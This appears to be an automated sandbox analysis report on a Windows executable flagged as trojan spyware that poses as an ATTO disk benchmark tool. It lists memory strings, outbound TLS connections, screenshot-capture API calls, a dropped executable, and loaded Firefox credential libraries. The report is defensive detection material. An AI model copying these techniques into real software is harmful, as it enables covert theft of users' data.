Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org#
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399181312.0000000019C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399181312.0000000019C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00931F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_00931F2A

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File dump: AttoConvertVideo.exe.0.dr 979379375

Jump to dropped file

Contains functionality to call native functions

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0092145B GetCurrentProcess,NtQueryInformationProcess,

2_2_0092145B

Detected potential crypto function

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093C603	2_2_0093C603
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093B8A3	2_2_0093B8A3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094DAC3	2_2_0094DAC3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094D353	2_2_0094D353
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00939698	2_2_00939698
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094CEBE	2_2_0094CEBE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094DEAB	2_2_0094DEAB
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094D6F1	2_2_0094D6F1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA4ECC0	2_2_6CA4ECC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAAECD0	2_2_6CAAECD0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2AC30	2_2_6CB2AC30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB16C00	2_2_6CB16C00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA5AC60	2_2_6CA5AC60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA54DB0	2_2_6CA54DB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE6D90	2_2_6CAE6D90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBDCDC0	2_2_6CBDCDC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBD8D20	2_2_6CBD8D20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1ED70	2_2_6CB1ED70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB7AD50	2_2_6CB7AD50
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAD6E90	2_2_6CAD6E90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA5AEC0	2_2_6CA5AEC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAF0EC0	2_2_6CAF0EC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB30E20	2_2_6CB30E20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAEEE70	2_2_6CAEEE70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB98FB0	2_2_6CB98FB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA5EFB0	2_2_6CA5EFB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2EFF0	2_2_6CB2EFF0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA50FE0	2_2_6CA50FE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB90F20	2_2_6CB90F20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA56F10	2_2_6CA56F10
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB12F70	2_2_6CB12F70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CABEF40	2_2_6CABEF40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB568E0	2_2_6CB568E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAA0820	2_2_6CAA0820
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CADA820	2_2_6CADA820
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB24840	2_2_6CB24840
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB109B0	2_2_6CB109B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE09A0	2_2_6CAE09A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB0A9A0	2_2_6CB0A9A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB6C9E0	2_2_6CB6C9E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA849F0	2_2_6CA849F0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAA6900	2_2_6CAA6900
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA88960	2_2_6CA88960
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CACEA80	2_2_6CACEA80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB08A30	2_2_6CB08A30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAFEA00	2_2_6CAFEA00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CACCA70	2_2_6CACCA70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAF0BA0	2_2_6CAF0BA0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB56BE0	2_2_6CB56BE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB7A480	2_2_6CB7A480
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA964D0	2_2_6CA964D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAEA4D0	2_2_6CAEA4D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB4420	2_2_6CAB4420
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CADA430	2_2_6CADA430
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA68460	2_2_6CA68460
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA445B0	2_2_6CA445B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1A5E0	2_2_6CB1A5E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CADE5F0	2_2_6CADE5F0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB2560	2_2_6CAB2560
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAF0570	2_2_6CAF0570
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB98550	2_2_6CB98550
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAA8540	2_2_6CAA8540
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB54540	2_2_6CB54540
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAAE6E0	2_2_6CAAE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAEE6E0	2_2_6CAEE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA746D0	2_2_6CA746D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAAC650	2_2_6CAAC650
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA7A7D0	2_2_6CA7A7D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAD0700	2_2_6CAD0700
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2C0B0	2_2_6CB2C0B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA600B0	2_2_6CA600B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA48090	2_2_6CA48090
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB18010	2_2_6CB18010
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1C000	2_2_6CB1C000
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA9E070	2_2_6CA9E070
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA501E0	2_2_6CA501E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB34130	2_2_6CB34130
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAC6130	2_2_6CAC6130
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB8140	2_2_6CAB8140
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1E2B0	2_2_6CB1E2B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB222A0	2_2_6CB222A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBD62C0	2_2_6CBD62C0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB28220	2_2_6CB28220
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1A210	2_2_6CB1A210
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAD8260	2_2_6CAD8260
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE8250	2_2_6CAE8250
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA823A0	2_2_6CA823A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAAE3B0	2_2_6CAAE3B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAA43E0	2_2_6CAA43E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAC2320	2_2_6CAC2320
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB92370	2_2_6CB92370
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA52370	2_2_6CA52370
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB6C360	2_2_6CB6C360
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE6370	2_2_6CAE6370
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA58340	2_2_6CA58340
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB11CE0	2_2_6CB11CE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB8DCD0	2_2_6CB8DCD0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA61C30	2_2_6CA61C30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA53C40	2_2_6CA53C40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB79C40	2_2_6CB79C40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA43D80	2_2_6CA43D80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB99D90	2_2_6CB99D90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB21DC0	2_2_6CB21DC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB3D00	2_2_6CAB3D00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA73EC0	2_2_6CA73EC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB5DE10	2_2_6CB5DE10
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBABE70	2_2_6CBABE70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBD5E60	2_2_6CBD5E60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA71F90	2_2_6CA71F90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAFBFF0	2_2_6CAFBFF0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB6DFC0	2_2_6CB6DFC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBD3FC0	2_2_6CBD3FC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA85F20	2_2_6CA85F20

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 6CB89F30 appears 31 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 009247E8 appears 38 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 6CA73620 appears 73 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 009304BC appears 37 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 6CA79B10 appears 73 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 009305DE appears 71 times

PE file contains executable resources (Code or Archives)

Source: 7ZthFNAqYp.exe	Static PE information: Resource name: None type: DOS executable (COM)
Source: AttoConvertVideo.exe.0.dr	Static PE information: Resource name: None type: DOS executable (COM)

Sample file is different than original file name gathered from version info

Source: 7ZthFNAqYp.exe	Binary or memory string: OriginalFilename vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000000.2134642418.000000000082F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332999034.0000000002E74000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3392292376.000000000082F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3417574339.000000006FD92000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe

Uses 32bit PE files

Source: 7ZthFNAqYp.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/22@3/4

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_6CAB0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

2_2_6CAB0300

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0093147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_0093147A

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0093196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

2_2_0093196C

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File created: C:\Users\user\Music\AttoDesignerUpdater

Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: 7ZthFNAqYp.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
